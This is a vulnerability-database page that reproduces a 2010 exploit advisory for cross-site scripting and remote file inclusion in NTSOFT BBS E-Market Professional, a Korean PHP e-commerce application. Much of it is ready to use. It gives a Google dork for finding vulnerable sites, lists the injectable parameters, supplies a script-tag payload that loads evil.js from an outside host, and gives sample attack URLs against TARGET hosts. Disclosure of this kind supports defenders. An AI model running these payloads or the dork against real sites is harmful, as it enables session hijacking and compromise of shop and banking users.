Vulmon Recent Vulnerabilities Product List Research Posts Trends Blog About Contact

NTSOFT BBS E-Market Professional Cross Site Scripting

Related Vulnerabilities: CVE-2009-3152  
Publish Date: 06 Jul 2010
Author: Ivan Sanchez
Source 
                +================================================================================================+
+                 NTSOFT BBS E-Market Professional  & XSS and Remote Execution Evil code         +
+================================================================================================+


Author(s): Ivan Sanchez 

Product:   NTSOFT, All Right Reserved.

Vendor Overview: NTSOFT. (Korean ecommerce application)

Vendor Homepage: http://www.nt.co.kr/



Date: 03/07/2010


"most off all korean sites that handle e-shop , e-banking,... use this software"


Description:
------------

BBS E-Market Professional is a Korean Web based e-commerce application implemented in PHP.

BBS E-Market Professional is reported to be affected by a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system. 
The issue presents itself due to improper validation of user-supplied data. 




During 2009, I reported some bugs:
----------------------------------

http://www.packetstormsecurity.org/0907-exploits/ntsoft-xss.txt

http://www.securityfocus.com/bid/35893 

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3152

http://xforce.iss.net/xforce/xfdb/52157

http://secunia.com/advisories/26117

http://www.juniper.net/security/auto/vulnerabilities/vuln35893.html



GOOGLE DORKS:
------------

intext: "NTSOFT All rights reserved"



Parameters affected:

-------------------

2010:

pageurl=   evil.js
co_no=     evil.js
b_temcode= evil.js



2009:

page= evil.js
bt_code= evil.js
b_no= evil.js






Evil Code to put:
-----------------

Example:  "><script src=http://site/scripts/evil.js></script> 




Example URl affected:
---------------------


2009:

http://[TARGET]becommunity/community/index.php?pageurl=board&mode=view&b_no=Evil-code5014&bt_code=Evil-code&page=Evil-code



2010:

http://TARGET/becommunity/community/index.php?pageurl= EVIL_CODE


http://TARGET/becommunity/community/index.php?pageurl=board&mode=comment_del&co_no=93809&b_no=434&bt_code=17&page=1&flg=3&co_no=EVIL_CODE


http://TARGET/becommunity/community/index.php?pageurl=board&mode=comment_del&co_no=105580&b_no=5231&b_temcode=19&page=7&flg=EVIL_CODE &co_no=105580


http://TARGET/becommunity/community/index.php?pageurl=board&mode=comment_del&co_no=105580&b_no=5231&b_temcode=EVIL_CODEE&page=7&flg=3&co_no=105580





Thank you so Much! Ivan,


NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!

+================================================================================================+
+                  NTSOFT BBS E-Market Professional & XSS and Remote Execution Evil code         +
+================================================================================================+
















<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Product List Vendor List Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook
Vulmon Logo
Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started